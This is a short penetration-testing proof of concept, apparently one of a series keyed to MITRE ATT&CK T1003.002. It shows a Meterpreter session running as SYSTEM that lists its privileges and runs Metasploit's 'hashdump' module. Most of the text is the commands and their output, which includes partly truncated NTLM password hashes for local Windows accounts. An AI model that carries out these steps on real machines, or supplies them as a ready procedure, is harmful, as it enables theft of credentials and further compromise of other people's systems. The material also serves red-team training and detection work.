======================================================================================================================
OS Credential Dumping (Registry) using 'Metasploit' (Hashdump module)
======================================================================================================================

Usefull link: 
> https://attack.mitre.org/techniques/T1003/002/

Note: The module hashdump of Metasploit is detected/flagged by many AV solutions including Windows Defender.

---------------------------------------------------------------------------------------------------------------------
PoC. Use the module 'hashdump' of metasploit to dump the Windows password hashes stored in the registry hives of a 
     target Windows computer
---------------------------------------------------------------------------------------------------------------------

[*] Meterpreter session 1 opened (192.168.1.34:4444 -> 192.168.1.4:1079) at 2020-04-05 06:56:45 +0200

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeCreatePagefilePrivilege
SeCreatePermanentPrivilege
SeCreateTokenPrivilege
SeDebugPrivilege
SeImpersonatePrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeLoadDriverPrivilege
SeLockMemoryPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeTcbPrivilege
SeUndockPrivilege

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7<snip>
alex:1003:aad3b435b51404eeaad3b435b51404ee:504182f8417ed8557b67e96adc8b4d04<snip>
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0<snip>
HelpAssistant:1000:a03299a993da915ca9d82696d8625873:a8976221dea345e51ba030d<snip>
pentester:1004:1e99d771a164613ab6cb882f20962373:fe4b8e9e7da90982005360caf7a<snip>
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:198b84b154680454ed6c<snip>
<SNIP> 
